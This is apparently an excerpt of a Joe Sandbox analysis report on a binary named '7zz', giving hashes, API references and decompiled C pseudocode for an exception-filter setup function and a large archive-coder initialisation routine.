                                                                                                                                    • Instruction ID: 2873cf6bad21c2a51a49be2c119f9dc910efd3d225da868e7d860f0ff405fddb
                                                                                                                                    • Opcode Fuzzy Hash: 1c5c9b3bbc459ceaa168d8dbf2743ba381f88a3378da8e3fc4aaaada2f7fab74
                                                                                                                                    • Instruction Fuzzy Hash: 2DC09B74D0420D97CB00E7E5D94E88E77FCE748105F400461D515E3141E670F99587E6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0046E6AA Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0046E6AA() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0046E664); // executed
				 *0x4936e8 = _t1;
				return _t1;
			}




                                                                                                                                    0x0046e6af
                                                                                                                                    0x0046e6b5
                                                                                                                                    0x0046e6ba

                                                                                                                                    APIs
                                                                                                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_0006E664), ref: 0046E6AF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                    • Opcode ID: c7f1619ac543780bbf34eb8e95484e4113401968d6038d2ffaa388747d46fa77
                                                                                                                                    • Instruction ID: a5106b7f6ad9fc50672dff64106b0fe435b0594dc7b9e21cd679f57e89e9b924
                                                                                                                                    • Opcode Fuzzy Hash: c7f1619ac543780bbf34eb8e95484e4113401968d6038d2ffaa388747d46fa77
                                                                                                                                    • Instruction Fuzzy Hash: 56A012745013009A82105F10A8084083A50A260A037500036500040210D6700494490B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004264F7 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 904COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                    			E004264F7(signed int __ecx, void* __eflags) {
				signed int _t500;
				signed int _t511;
				signed int _t525;
				intOrPtr* _t545;
				signed int _t547;
				signed int _t550;
				signed int _t551;
				signed int _t556;
				signed int _t561;
				signed int _t562;
				intOrPtr* _t573;
				intOrPtr* _t574;
				signed int _t588;
				signed int _t598;
				signed int _t599;
				signed int _t602;
				void* _t611;
				intOrPtr* _t613;
				signed int _t615;
				signed int _t617;
				signed int _t618;
				signed int _t632;
				signed int _t633;
				signed int _t641;
				signed int _t642;
				signed int _t643;
				signed int _t650;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t669;
				signed int _t683;
				signed int _t684;
				intOrPtr _t686;
				signed int _t687;
				signed char _t689;
				char _t691;
				signed int _t692;
				signed int _t697;
				signed int _t702;
				signed int _t713;
				intOrPtr _t754;
				intOrPtr _t755;
				signed int _t763;
				intOrPtr* _t769;
				char _t792;
				signed int _t805;
				signed int _t835;
				signed int _t854;
				signed int _t874;
				signed int _t876;
				intOrPtr _t878;
				signed int* _t881;
				signed int _t882;
				signed int _t883;
				signed int _t884;
				intOrPtr* _t885;
				intOrPtr* _t886;
				intOrPtr _t888;
				signed int _t889;
				signed int _t890;
				void* _t891;
				intOrPtr* _t892;
				signed int _t893;
				signed int _t894;
				void* _t895;

				L0046B890(E00476819, _t895);
				_t878 =  *((intOrPtr*)(_t895 + 0x18));
				_t874 = __ecx;
				 *(_t895 - 0x14) = __ecx;
				if(E0042CD7D(_t878) == 0) {
					L93:
					_t500 = 0x80004001;
					L144:
					 *[fs:0x0] =  *((intOrPtr*)(_t895 - 0xc));
					return _t500;
				}
				_t713 = 0;
				 *((char*)( *((intOrPtr*)(_t895 + 0x28)))) = 0;
				E00405B9F(_t895 - 0x38);
				 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
				 *(_t895 - 4) = 0;
				 *((intOrPtr*)(_t895 - 0x5c)) = 0;
				L00467C60(_t895 - 0x58);
				 *(_t895 - 4) = 1;
				E0040C9B4(_t895 - 0x5c,  *(_t895 + 8));
				 *(_t895 - 0x10) = 0;
				if( *((intOrPtr*)(_t878 + 0x30)) <= 0) {
					L20:
					 *((intOrPtr*)(_t895 - 0x3c)) =  *((intOrPtr*)( *((intOrPtr*)(_t895 + 0x18)) + 8));
					E004264A2(_t895 - 0x108);
					 *(_t895 - 4) = 4;
					L00427466(_t895 - 0xb8);
					 *(_t895 - 4) = 5;
					L00427107( *((intOrPtr*)(_t895 + 0x18)), _t895 - 0x108);
					if( *_t874 == _t713) {
						L22:
						E0040862D();
						_t511 =  *(_t874 + 0x74);
						_t881 = _t874 + 0x74;
						if(_t511 != _t713) {
							 *((intOrPtr*)( *_t511 + 8))(_t511);
							 *_t881 = _t713;
						}
						if( *((intOrPtr*)(_t874 + 0x68)) != _t713) {
							_push(0x88);
							_t683 = L004079F2();
							 *(_t895 + 8) = _t683;
							 *(_t895 - 4) = 6;
							if(_t683 == _t713) {
								_t684 = 0;
								__eflags = 0;
							} else {
								_t684 = L0042732B(_t683);
							}
							 *(_t895 - 4) = 5;
							 *((intOrPtr*)(_t874 + 0x6c)) = _t684;
							E0040C9B4(_t881, _t684);
							_t686 =  *((intOrPtr*)(_t874 + 0x6c));
							if(_t686 == _t713) {
								_t687 = 0;
								__eflags = 0;
							} else {
								_t687 = _t686 + 4;
							}
							 *((intOrPtr*)(_t874 + 0x70)) = _t687;
						}
						_t882 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t874 + 0x70))))))(_t895 - 0x108);
						_t916 = _t882 - _t713;
						if(_t882 == _t713) {
							__eflags =  *((intOrPtr*)(_t895 - 0x3c)) - _t713;
							 *(_t895 - 0x18) = _t713;
							if(__eflags <= 0) {
								L51:
								L0042743A(_t874 + 4, __eflags, _t895 - 0x108);
								 *_t874 = 1;
								L52:
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t874 + 0x70)))) + 4))();
								__eflags =  *((intOrPtr*)(_t895 - 0x3c)) - _t713;
								 *(_t895 + 0x10) = _t713;
								 *(_t895 - 0x40) = _t713;
								 *(_t895 - 0x1c) = _t713;
								if( *((intOrPtr*)(_t895 - 0x3c)) <= _t713) {
									L135:
									E004241A3(_t895 - 0x108,  *((intOrPtr*)( *((intOrPtr*)(_t895 - 0xc0)))), _t895 - 0x7c, _t895 - 0x120);
									__eflags =  *((intOrPtr*)(_t874 + 0x68)) - _t713;
									if( *((intOrPtr*)(_t874 + 0x68)) != _t713) {
										 *((intOrPtr*)( *((intOrPtr*)(_t874 + 0x6c)) + 0x70)) =  *((intOrPtr*)(_t895 - 0x7c));
									}
									__eflags =  *((intOrPtr*)(_t895 - 0x3c)) - _t713;
									if( *((intOrPtr*)(_t895 - 0x3c)) != _t713) {
										E00404AD0(_t895 - 0x11c, 4);
										 *((intOrPtr*)(_t895 - 0x11c)) = 0x47b1f8;
										 *(_t895 - 4) = 0x2a;
										E0040867E(_t895 - 0x11c,  *((intOrPtr*)(_t895 - 0x30)));
										_t883 = 0;
										__eflags =  *((intOrPtr*)(_t895 - 0x30)) - _t713;
										if( *((intOrPtr*)(_t895 - 0x30)) <= _t713) {
											L142:
											 *((intOrPtr*)(_t895 - 0x78)) =  *((intOrPtr*)(_t895 + 0x1c));
											_t525 =  *(_t874 + 0x74);
											_t884 =  *((intOrPtr*)( *_t525 + 0xc))(_t525,  *((intOrPtr*)(_t895 - 0x110)), _t713,  *((intOrPtr*)(_t895 - 0x30)), _t895 - 0x78, _t713, 1,  *((intOrPtr*)(_t895 + 0x20)));
											 *(_t895 - 4) = 5;
											E00408604(_t895 - 0x11c);
											 *(_t895 - 4) = 1;
											L004272DB(_t895 - 0x108, __eflags);
											 *(_t895 - 4) = _t713;
											L00427310(_t895 - 0x5c);
											_t493 = _t895 - 4;
											 *_t493 =  *(_t895 - 4) | 0xffffffff;
											__eflags =  *_t493;
											E0042434D(_t895 - 0x38);
											L143:
											_t500 = _t884;
											goto L144;
										} else {
											goto L141;
										}
										do {
											L141:
											E00415C6D(_t895 - 0x11c,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t895 - 0x2c)) + _t883 * 4)))));
											_t883 = _t883 + 1;
											__eflags = _t883 -  *((intOrPtr*)(_t895 - 0x30));
										} while (_t883 <  *((intOrPtr*)(_t895 - 0x30)));
										goto L142;
									} else {
										 *(_t895 - 4) = 0x28;
										E00408604(_t895 - 0xb8);
										 *(_t895 - 4) = 1;
										L00423635(_t895 - 0x108, __eflags);
										 *(_t895 - 4) = _t713;
										DeleteCriticalSection(_t895 - 0x58);
										L0043361B(_t895 - 0x5c);
										 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
										 *(_t895 - 4) = 0x29;
										goto L139;
									}
								}
								 *(_t895 - 0x10) = _t713;
								do {
									 *(_t895 + 8) = _t713;
									 *(_t895 - 0x20) =  *( *((intOrPtr*)( *((intOrPtr*)(_t895 + 0x18)) + 0xc)) +  *(_t895 - 0x1c) * 4);
									_t885 =  *((intOrPtr*)( *(_t895 - 0x10) +  *((intOrPtr*)(_t874 + 0x84))));
									_t545 =  *_t885;
									 *(_t895 - 4) = 0x12;
									 *((intOrPtr*)( *_t545))(_t545, 0x47a528, _t895 + 8);
									_t547 =  *(_t895 + 8);
									__eflags = _t547 - _t713;
									if(_t547 == _t713) {
										L58:
										__eflags = _t547 - _t713;
										 *(_t895 - 4) = 5;
										if(_t547 != _t713) {
											 *((intOrPtr*)( *_t547 + 8))(_t547);
										}
										__eflags =  *((intOrPtr*)(_t895 + 0x2c)) - _t713;
										if( *((intOrPtr*)(_t895 + 0x2c)) == _t713) {
											L66:
											 *(_t895 - 0x24) = _t713;
											_t886 =  *_t885;
											 *(_t895 - 4) = 0x1a;
											 *((intOrPtr*)( *_t886))(_t886, 0x47a478, _t895 - 0x24);
											_t550 =  *(_t895 - 0x24);
											__eflags = _t550 - _t713;
											if(_t550 == _t713) {
												L73:
												__eflags = _t550 - _t713;
												 *(_t895 - 4) = 5;
												if(_t550 != _t713) {
													 *((intOrPtr*)( *_t550 + 8))(_t550);
												}
												_t551 =  *(_t895 - 0x20);
												 *(_t895 - 0x10) =  *(_t895 - 0x10) + 4;
												 *(_t895 - 0x14) =  *(_t551 + 0x14);
												 *(_t895 + 8) =  *(_t551 + 0x18);
												E00404AD0(_t895 - 0x90, 4);
												 *((intOrPtr*)(_t895 - 0x90)) = 0x47b1d4;
												 *(_t895 - 4) = 0x24;
												E00404AD0(_t895 - 0xa4, 4);
												 *((intOrPtr*)(_t895 - 0xa4)) = 0x47b1d4;
												 *(_t895 - 4) = 0x25;
												E0040867E(_t895 - 0x90,  *(_t895 - 0x14));
												_t556 = E0040867E(_t895 - 0xa4,  *(_t895 + 8));
												__eflags =  *(_t895 + 8) - _t713;
												if( *(_t895 + 8) <= _t713) {
													_t888 =  *((intOrPtr*)(_t895 + 0x18));
													goto L95;
												} else {
													_t888 =  *((intOrPtr*)(_t895 + 0x18));
													do {
														_t556 = E00415C6D(_t895 - 0xa4,  *(_t888 + 0x48) +  *(_t895 - 0x40) * 8);
														 *(_t895 - 0x40) =  *(_t895 - 0x40) + 1;
														_t251 = _t895 + 8;
														 *_t251 =  *(_t895 + 8) - 1;
														__eflags =  *_t251;
													} while ( *_t251 != 0);
													L95:
													__eflags =  *(_t895 - 0x14) - _t713;
													 *(_t895 - 0x20) = _t713;
													if( *(_t895 - 0x14) <= _t713) {
														goto L112;
													} else {
														goto L96;
													}
													do {
														L96:
														_t754 =  *((intOrPtr*)(_t888 + 0x1c));
														 *(_t895 + 8) = _t713;
														__eflags = _t754 - _t713;
														if(_t754 <= _t713) {
															L100:
															_t561 = _t556 | 0xffffffff;
															__eflags = _t561;
															L101:
															__eflags = _t561 - _t713;
															if(_t561 < _t713) {
																_t755 =  *((intOrPtr*)(_t888 + 0x30));
																 *(_t895 + 8) = _t713;
																__eflags = _t755 - _t713;
																if(_t755 <= _t713) {
																	L108:
																	_t562 = _t561 | 0xffffffff;
																	__eflags = _t562;
																	L109:
																	__eflags = _t562 - _t713;
																	if(_t562 < _t713) {
																		 *(_t895 - 4) = 0x24;
																		E00408604(_t895 - 0xa4);
																		 *(_t895 - 4) = 5;
																		E00408604(_t895 - 0x90);
																		 *(_t895 - 4) = 0x26;
																		E00408604(_t895 - 0xb8);
																		 *(_t895 - 4) = 1;
																		L00423635(_t895 - 0x108, __eflags);
																		 *(_t895 - 4) = _t713;
																		DeleteCriticalSection(_t895 - 0x58);
																		L0043361B(_t895 - 0x5c);
																		 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
																		 *(_t895 - 4) = 0x27;
																		E0040862D();
																		 *(_t895 - 4) =  *(_t895 - 4) | 0xffffffff;
																		E00408604(_t895 - 0x38);
																		_t500 = 0x80004005;
																		goto L144;
																	}
																	_t763 =  *(_t895 + 0x14);
																	goto L111;
																}
																_t574 =  *((intOrPtr*)(_t888 + 0x34));
																while(1) {
																	__eflags =  *_t574 -  *(_t895 + 0x10);
																	if( *_t574 ==  *(_t895 + 0x10)) {
																		break;
																	}
																	 *(_t895 + 8) =  *(_t895 + 8) + 1;
																	_t574 = _t574 + 4;
																	__eflags =  *(_t895 + 8) - _t755;
																	if( *(_t895 + 8) < _t755) {
																		continue;
																	}
																	goto L108;
																}
																_t562 =  *(_t895 + 8);
																goto L109;
															}
															_t562 =  *( *((intOrPtr*)(_t888 + 0x20)) + 4 + _t561 * 8);
															_t763 =  *(_t888 + 0x48);
															goto L111;
														}
														_t573 =  *((intOrPtr*)(_t888 + 0x20));
														while(1) {
															__eflags =  *_t573 -  *(_t895 + 0x10);
															if( *_t573 ==  *(_t895 + 0x10)) {
																break;
															}
															 *(_t895 + 8) =  *(_t895 + 8) + 1;
															_t573 = _t573 + 8;
															__eflags =  *(_t895 + 8) - _t754;
															if( *(_t895 + 8) < _t754) {
																continue;
															}
															goto L100;
														}
														_t561 =  *(_t895 + 8);
														goto L101;
														L111:
														E00415C6D(_t895 - 0x90, _t763 + _t562 * 8);
														 *(_t895 - 0x20) =  *(_t895 - 0x20) + 1;
														 *(_t895 + 0x10) =  *(_t895 + 0x10) + 1;
														_t556 =  *(_t895 - 0x20);
														__eflags = _t556 -  *(_t895 - 0x14);
													} while (_t556 <  *(_t895 - 0x14));
													goto L112;
												}
											}
											_t769 =  *((intOrPtr*)(_t895 + 0x24));
											__eflags = _t769 - _t713;
											if(_t769 == _t713) {
												__eflags = _t550 - _t713;
												 *(_t895 - 4) = 5;
												if(_t550 != _t713) {
													 *((intOrPtr*)( *_t550 + 8))(_t550);
												}
												 *(_t895 - 4) = 0x1b;
												E00408604(_t895 - 0xb8);
												 *(_t895 - 4) = 1;
												L00423635(_t895 - 0x108, __eflags);
												 *(_t895 - 4) = _t713;
												DeleteCriticalSection(_t895 - 0x58);
												L0043361B(_t895 - 0x5c);
												 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
												 *(_t895 - 4) = 0x1c;
												_t884 = 0x80004005;
												L133:
												E0040862D();
												 *(_t895 - 4) =  *(_t895 - 4) | 0xffffffff;
												E00408604(_t895 - 0x38);
												goto L143;
											}
											 *(_t895 - 0x18) = _t713;
											 *(_t895 - 4) = 0x1d;
											_t884 =  *((intOrPtr*)( *_t769 + 0xc))(_t769, _t895 - 0x18);
											__eflags = _t884 - _t713;
											if(_t884 != _t713) {
												__imp__#6( *(_t895 - 0x18));
												_t588 =  *(_t895 - 0x24);
												 *(_t895 - 4) = 5;
												__eflags = _t588 - _t713;
												if(_t588 != _t713) {
													 *((intOrPtr*)( *_t588 + 8))(_t588);
												}
												 *(_t895 - 4) = 0x1e;
												E00408604(_t895 - 0xb8);
												 *(_t895 - 4) = 1;
												L00423635(_t895 - 0x108, __eflags);
												 *(_t895 - 4) = _t713;
												DeleteCriticalSection(_t895 - 0x58);
												L0043361B(_t895 - 0x5c);
												 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
												 *(_t895 - 4) = 0x1f;
												goto L133;
											}
											 *(_t895 - 0x64) = _t713;
											 *(_t895 - 0x60) = _t713;
											 *((intOrPtr*)(_t895 - 0x68)) = 0x47a7ec;
											 *(_t895 - 4) = 0x20;
											 *((char*)( *((intOrPtr*)(_t895 + 0x28)))) = 1;
											L00403532(_t895 - 0x74,  *(_t895 - 0x18));
											 *(_t895 - 4) = 0x21;
											_t891 =  *((intOrPtr*)(_t895 - 0x70)) +  *((intOrPtr*)(_t895 - 0x70));
											E0040FA26(_t895 - 0x68, _t891);
											__eflags =  *((intOrPtr*)(_t895 - 0x70)) - _t713;
											 *(_t895 + 8) = _t713;
											if( *((intOrPtr*)(_t895 - 0x70)) <= _t713) {
												L71:
												_t598 =  *(_t895 - 0x24);
												_t599 =  *((intOrPtr*)( *_t598 + 0xc))(_t598,  *(_t895 - 0x60), _t891);
												_push( *((intOrPtr*)(_t895 - 0x74)));
												_t884 = _t599;
												__eflags = _t884 - _t713;
												if(_t884 != _t713) {
													E00407A18();
													 *((intOrPtr*)(_t895 - 0x68)) = 0x47a7ec;
													E00407A18( *(_t895 - 0x60));
													__imp__#6( *(_t895 - 0x18));
													_t602 =  *(_t895 - 0x24);
													 *(_t895 - 4) = 5;
													__eflags = _t602 - _t713;
													if(_t602 != _t713) {
														 *((intOrPtr*)( *_t602 + 8))(_t602);
													}
													 *(_t895 - 4) = 0x22;
													E00408604(_t895 - 0xb8);
													 *(_t895 - 4) = 1;
													L00423635(_t895 - 0x108, __eflags);
													 *(_t895 - 4) = _t713;
													DeleteCriticalSection(_t895 - 0x58);
													L0043361B(_t895 - 0x5c);
													 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
													 *(_t895 - 4) = 0x23;
													goto L133;
												}
												E00407A18();
												 *((intOrPtr*)(_t895 - 0x68)) = 0x47a7ec;
												E00407A18( *(_t895 - 0x60));
												__imp__#6( *(_t895 - 0x18));
												_t550 =  *(_t895 - 0x24);
												goto L73;
											} else {
												goto L70;
											}
											do {
												L70:
												_t611 =  *(_t895 + 8) +  *(_t895 + 8);
												_t792 =  *((intOrPtr*)(_t611 +  *((intOrPtr*)(_t895 - 0x74))));
												 *((char*)( *(_t895 - 0x60) + _t611)) = _t792;
												 *(_t895 + 8) =  *(_t895 + 8) + 1;
												 *((char*)( *(_t895 - 0x60) + _t611 + 1)) = _t792;
												__eflags =  *(_t895 + 8) -  *((intOrPtr*)(_t895 - 0x70));
											} while ( *(_t895 + 8) <  *((intOrPtr*)(_t895 - 0x70)));
											goto L71;
										} else {
											 *(_t895 + 8) = _t713;
											_t613 =  *_t885;
											 *(_t895 - 4) = 0x17;
											 *((intOrPtr*)( *_t613))(_t613, 0x47a4f8, _t895 + 8);
											_t615 =  *(_t895 + 8);
											__eflags = _t615 - _t713;
											if(_t615 == _t713) {
												L64:
												__eflags = _t615 - _t713;
												 *(_t895 - 4) = 5;
												if(_t615 != _t713) {
													 *((intOrPtr*)( *_t615 + 8))(_t615);
												}
												goto L66;
											}
											_t617 =  *((intOrPtr*)( *_t615 + 0xc))(_t615,  *((intOrPtr*)(_t895 + 0x30)));
											__eflags = _t617 - _t713;
											 *(_t895 - 0x14) = _t617;
											if(_t617 != _t713) {
												_t618 =  *(_t895 + 8);
												 *(_t895 - 4) = 5;
												__eflags = _t618 - _t713;
												if(_t618 != _t713) {
													 *((intOrPtr*)( *_t618 + 8))(_t618);
												}
												 *(_t895 - 4) = 0x18;
												E00408604(_t895 - 0xb8);
												 *(_t895 - 4) = 1;
												L00423635(_t895 - 0x108, __eflags);
												 *(_t895 - 4) = _t713;
												DeleteCriticalSection(_t895 - 0x58);
												L0043361B(_t895 - 0x5c);
												 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
												 *(_t895 - 4) = 0x19;
												E0040862D();
												 *(_t895 - 4) =  *(_t895 - 4) | 0xffffffff;
												E00408604(_t895 - 0x38);
												_t500 =  *(_t895 - 0x14);
												goto L144;
											}
											_t615 =  *(_t895 + 8);
											goto L64;
										}
									}
									_t805 =  *( *(_t895 - 0x20) + 0xc);
									__eflags = _t805 - 0xffffffff;
									 *(_t895 - 0x14) = _t805;
									if(_t805 > 0xffffffff) {
										__eflags = _t547 - _t713;
										 *(_t895 - 4) = 5;
										if(_t547 != _t713) {
											 *((intOrPtr*)( *_t547 + 8))(_t547);
										}
										 *(_t895 - 4) = 0x13;
										E00408604(_t895 - 0xb8);
										 *(_t895 - 4) = 1;
										L00423635(_t895 - 0x108, __eflags);
										 *(_t895 - 4) = _t713;
										DeleteCriticalSection(_t895 - 0x58);
										L0043361B(_t895 - 0x5c);
										 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
										 *(_t895 - 4) = 0x14;
										L89:
										_t884 = 0x80004001;
										goto L133;
									}
									_t632 =  *((intOrPtr*)( *_t547 + 0xc))(_t547,  *((intOrPtr*)( *(_t895 - 0x20) + 0x10)),  *(_t895 - 0x14));
									__eflags = _t632 - _t713;
									 *(_t895 - 0x14) = _t632;
									if(_t632 != _t713) {
										_t633 =  *(_t895 + 8);
										 *(_t895 - 4) = 5;
										__eflags = _t633 - _t713;
										if(_t633 != _t713) {
											 *((intOrPtr*)( *_t633 + 8))(_t633);
										}
										 *(_t895 - 4) = 0x15;
										E00408604(_t895 - 0xb8);
										 *(_t895 - 4) = 1;
										L00423635(_t895 - 0x108, __eflags);
										 *(_t895 - 4) = _t713;
										DeleteCriticalSection(_t895 - 0x58);
										L0043361B(_t895 - 0x5c);
										 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
										_t884 =  *(_t895 - 0x14);
										 *(_t895 - 4) = 0x16;
										goto L133;
									}
									_t547 =  *(_t895 + 8);
									goto L58;
									L112:
									_t889 =  *(_t895 - 0x1c);
									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t874 + 0x70)))) + 8))(_t889,  *((intOrPtr*)(_t895 - 0x84)),  *((intOrPtr*)(_t895 - 0x98)));
									 *(_t895 - 4) = 0x24;
									E00408604(_t895 - 0xa4);
									 *(_t895 - 4) = 5;
									E00408604(_t895 - 0x90);
									_t890 = _t889 + 1;
									__eflags = _t890 -  *((intOrPtr*)(_t895 - 0x3c));
									 *(_t895 - 0x1c) = _t890;
								} while (_t890 <  *((intOrPtr*)(_t895 - 0x3c)));
								goto L135;
							} else {
								goto L35;
							}
							while(1) {
								L35:
								_t892 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t895 + 0x18)) + 0xc)) +  *(_t895 - 0x18) * 4));
								 *(_t895 + 0x10) = _t713;
								 *(_t895 + 8) = _t713;
								_push(_t713);
								_push( *((intOrPtr*)(_t892 + 4)));
								 *(_t895 - 4) = 0xa;
								_push( *_t892); // executed
								_t641 = E0040C914(_t895 + 0x10, _t895 + 8, __eflags); // executed
								__eflags = _t641 - _t713;
								 *(_t895 - 0x1c) = _t641;
								if(_t641 != _t713) {
									break;
								}
								 *(_t895 - 0x10) = _t713;
								__eflags =  *((intOrPtr*)(_t892 + 0x14)) - 1;
								 *(_t895 - 4) = 0xd;
								if( *((intOrPtr*)(_t892 + 0x14)) != 1) {
									L41:
									__eflags =  *(_t895 + 8) - _t713;
									if( *(_t895 + 8) == _t713) {
										_t650 =  *(_t895 + 0x10);
										 *(_t895 - 4) = 5;
										__eflags = _t650 - _t713;
										if(_t650 != _t713) {
											 *((intOrPtr*)( *_t650 + 8))(_t650);
										}
										 *(_t895 - 4) = 0x10;
										E00408604(_t895 - 0xb8);
										 *(_t895 - 4) = 1;
										L00423635(_t895 - 0x108, __eflags);
										 *(_t895 - 4) = _t713;
										DeleteCriticalSection(_t895 - 0x58);
										L0043361B(_t895 - 0x5c);
										 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
										 *(_t895 - 4) = 0x11;
										E0040862D();
										_t297 = _t895 - 4;
										 *_t297 =  *(_t895 - 4) | 0xffffffff;
										__eflags =  *_t297;
										E00408604(_t895 - 0x38);
										goto L93;
									}
									E0040C9B4(_t895 - 0x10,  *(_t895 + 8));
									__eflags =  *((intOrPtr*)(_t874 + 0x68)) - _t713;
									if(__eflags != 0) {
										L00423E7F( *((intOrPtr*)(_t874 + 0x6c)), _t895, __eflags,  *(_t895 + 8));
									}
									L44:
									_push(_t895 - 0x10);
									L0042757B(_t874 + 0x78);
									_t661 =  *(_t895 - 0x10);
									 *(_t895 - 4) = 0xa;
									__eflags = _t661 - _t713;
									if(_t661 != _t713) {
										 *((intOrPtr*)( *_t661 + 8))(_t661);
									}
									_t662 =  *(_t895 + 8);
									 *(_t895 - 4) = 9;
									__eflags = _t662 - _t713;
									if(_t662 != _t713) {
										 *((intOrPtr*)( *_t662 + 8))(_t662);
									}
									_t663 =  *(_t895 + 0x10);
									 *(_t895 - 4) = 5;
									__eflags = _t663 - _t713;
									if(_t663 != _t713) {
										 *((intOrPtr*)( *_t663 + 8))(_t663);
									}
									 *(_t895 - 0x18) =  *(_t895 - 0x18) + 1;
									__eflags =  *(_t895 - 0x18) -  *((intOrPtr*)(_t895 - 0x3c));
									if(__eflags < 0) {
										continue;
									} else {
										goto L51;
									}
								}
								__eflags =  *((intOrPtr*)(_t892 + 0x18)) - 1;
								if( *((intOrPtr*)(_t892 + 0x18)) != 1) {
									goto L41;
								}
								_t835 =  *(_t895 + 0x10);
								__eflags = _t835 - _t713;
								if(_t835 == _t713) {
									_t669 =  *(_t895 + 8);
									 *(_t895 - 4) = 9;
									__eflags = _t669 - _t713;
									if(_t669 != _t713) {
										 *((intOrPtr*)( *_t669 + 8))(_t669);
										_t835 =  *(_t895 + 0x10);
									}
									__eflags = _t835 - _t713;
									 *(_t895 - 4) = 5;
									if(_t835 != _t713) {
										 *((intOrPtr*)( *_t835 + 8))(_t835);
									}
									 *(_t895 - 4) = 0xe;
									E00408604(_t895 - 0xb8);
									 *(_t895 - 4) = 1;
									L00423635(_t895 - 0x108, __eflags);
									 *(_t895 - 4) = _t713;
									DeleteCriticalSection(_t895 - 0x58);
									L0043361B(_t895 - 0x5c);
									 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
									 *(_t895 - 4) = 0xf;
									goto L89;
								}
								E0040C9B4(_t895 - 0x10, _t835);
								__eflags =  *((intOrPtr*)(_t874 + 0x68)) - _t713;
								if(__eflags != 0) {
									L00423E5A( *((intOrPtr*)(_t874 + 0x6c)), _t895, __eflags,  *(_t895 + 0x10));
								}
								goto L44;
							}
							_t642 =  *(_t895 + 8);
							 *(_t895 - 4) = 9;
							__eflags = _t642 - _t713;
							if(_t642 != _t713) {
								 *((intOrPtr*)( *_t642 + 8))(_t642);
							}
							_t643 =  *(_t895 + 0x10);
							 *(_t895 - 4) = 5;
							__eflags = _t643 - _t713;
							if(_t643 != _t713) {
								 *((intOrPtr*)( *_t643 + 8))(_t643);
							}
							 *(_t895 - 4) = 0xb;
							E00408604(_t895 - 0xb8);
							 *(_t895 - 4) = 1;
							L00423635(_t895 - 0x108, __eflags);
							 *(_t895 - 4) = _t713;
							DeleteCriticalSection(_t895 - 0x58);
							L0043361B(_t895 - 0x5c);
							 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
							_t884 =  *(_t895 - 0x1c);
							 *(_t895 - 4) = 0xc;
							goto L133;
						} else {
							 *(_t895 - 4) = 7;
							E00408604(_t895 - 0xb8);
							 *(_t895 - 4) = 1;
							L00423635(_t895 - 0x108, _t916);
							 *(_t895 - 4) = _t713;
							DeleteCriticalSection(_t895 - 0x58);
							L0043361B(_t895 - 0x5c);
							 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
							 *(_t895 - 4) = 8;
							_t713 = _t882;
							L139:
							E0040862D();
							 *(_t895 - 4) =  *(_t895 - 4) | 0xffffffff;
							E00408604(_t895 - 0x38);
							_t500 = _t713;
							goto L144;
						}
					}
					_t689 = L0042721E(_t895 - 0x108, _t874 + 4);
					asm("sbb al, al");
					_t691 =  ~_t689 + 1;
					 *((char*)(_t895 + 0xb)) = _t691;
					if(_t691 == 0) {
						goto L52;
					}
					goto L22;
				} else {
					_t893 =  *(_t895 + 0x14);
					 *(_t895 + 8) = _t893;
					L4:
					_push(0x18);
					_t692 = L004079F2();
					if(_t692 == _t713) {
						_t876 = 0;
						__eflags = 0;
					} else {
						 *(_t692 + 4) = _t713;
						 *_t692 = 0x47b228;
						_t876 = _t692;
					}
					 *(_t895 - 0x40) = _t876;
					if(_t876 != _t713) {
						 *((intOrPtr*)( *_t876 + 4))(_t876);
					}
